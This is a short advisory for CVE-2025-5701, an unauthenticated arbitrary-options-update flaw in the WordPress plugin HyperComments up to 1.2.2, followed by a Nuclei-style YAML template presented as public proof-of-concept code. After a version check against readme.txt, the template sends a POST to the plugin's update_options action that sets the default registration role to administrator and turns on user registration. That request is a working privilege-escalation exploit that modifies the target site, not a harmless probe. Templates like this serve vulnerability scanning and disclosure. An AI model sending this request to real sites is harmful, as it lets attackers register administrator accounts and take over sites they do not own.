The HyperComments plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the hc_request_handler function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
PoC代码[已公开]
id: CVE-2025-5701
info:
name: HyperComments <= 1.2.2 - Arbitrary Options Update
author: kylew1004
severity: critical
description: |
The HyperComments plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the hc_request_handler function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
reference:
- https://github.com/Nxploited/CVE-2025-5701/blob/main/CVE-2025-5701.py
- https://nvd.nist.gov/vuln/detail/CVE-2025-5701
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-5701
epss-score: 0.11045
epss-percentile: 0.93124
cwe-id: CWE-862
metadata:
verified: false
max-request: 2
vendor: wordpress
product: hypercomments
fofa-query: body="/wp-content/plugins/hypercomments"
tags: cve,cve2025,wp,wp-plugin,wordpress,hypercomments,priv-esc,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/hypercomments/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- compare_versions(detected_version, "<= 1.2.2")
internal: true
extractors:
- type: regex
part: body
name: detected_version
group: 1
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
internal: true
- raw:
- |
POST /wp-admin/index.php?hc_action=update_options HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"default_role":"administrator","users_can_register":"1"}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '(?i)\{\s*"result"\s*:\s*"success"\s*\}'
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- '"version: " + detected_version'
# digest: 4a0a00473045022100891383b201f4a3531da10232ff2ff5932bb0f7124d83bc7523a6bf0231d20b14022065066865da440a9faa2d8e4cc10e80d5bcd1b13ba9df590678e985c9967ac2a3:922c64590222798bb761d5b6d8e72950